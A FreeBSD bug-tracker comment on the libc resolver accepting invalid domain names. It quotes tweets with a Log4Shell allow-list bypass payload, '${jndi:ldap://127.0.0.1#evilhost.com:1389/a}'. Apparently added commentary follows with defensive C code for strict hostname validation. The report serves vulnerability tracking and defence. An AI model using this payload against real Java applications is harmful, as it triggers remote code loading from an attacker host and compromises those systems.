[Bug 260770] libc resolver does not validate domain names
- In reply to: bugzilla-noreply_a_freebsd.org: "[Bug 260770] libc resolver does not validate domain names"
Date: Wed, 29 Dec 2021 01:24:29 UTC
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=260770

--- Comment #1 from Ed Maste <emaste@freebsd.org> ---
Ref: https://twitter.com/marcioalm/status/1471740771581652995
> FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks
> in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a}
> and to bypass allowedClasses just choose a name for a class in the JDK.
> Deserialization will occur as usual. #Log4Shell 1/n

https://twitter.com/Shaquil86300527/status/1472153790463815680
> In my tests, this doesn't work on Windows and Linux. It does work in MacOS and
> FreeBSD.
> # is not valid for DNS but *some* resolver might query names with # in it.
> TBC for this to work the vulnerable application must run on FreeBSD or MacOS
> and actor must control a DNS domain.

--
You are receiving this mail because:
You are the assignee for the bug.
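The quoted tweet notes that `#` is not valid in a DNS name yet some resolvers will still query such names. As an added illustration (my own code, not from the bug report or from FreeBSD's libc), here is a strict RFC 952/1123 hostname check that an application can apply before handing a name to the resolver; it rejects `127.0.0.1#evilhost.com` outright. The function name `valid_hostname` and the sample names are my own.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define MAX_LABEL 63   /* RFC 1035: per-label limit */
#define MAX_NAME  253  /* RFC 1035: text-form name limit */

/* True if `name` matches the RFC 952/1123 preferred name syntax:
 * dot-separated labels of letters, digits and hyphens, no empty label,
 * no label starting or ending with a hyphen.  One trailing dot (an
 * absolute name) is tolerated.  Any other byte, including '#', '/',
 * ':' or whitespace, makes the name invalid. */
bool valid_hostname(const char *name)
{
    size_t len = strlen(name);
    if (len == 0)
        return false;
    if (name[len - 1] == '.')           /* strip one trailing dot */
        len--;
    if (len == 0 || len > MAX_NAME)
        return false;

    size_t label_len = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '.') {
            if (label_len == 0 || name[i - 1] == '-')
                return false;           /* empty label or trailing hyphen */
            label_len = 0;
            continue;
        }
        if (!(isalnum(c) || c == '-'))
            return false;               /* e.g. '#' in 127.0.0.1#evilhost.com */
        if (label_len == 0 && c == '-')
            return false;               /* leading hyphen */
        if (++label_len > MAX_LABEL)
            return false;
    }
    return label_len > 0 && name[len - 1] != '-';  /* check last label */
}

int main(void)
{
    /* constructed sample names, the second one quoted from the bug report */
    const char *samples[] = { "evilhost.com", "127.0.0.1#evilhost.com",
                              "a-b.example.", "-bad.example", "bad-.example" };
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++)
        printf("%-24s %s\n", samples[i], valid_hostname(samples[i]) ? "ok" : "rejected");
    return 0;
}
```

This is a syntax check only; it says nothing about whether the name resolves or whom it belongs to, so it belongs in front of, not instead of, an allow-list such as Log4J's allowedLdapHost.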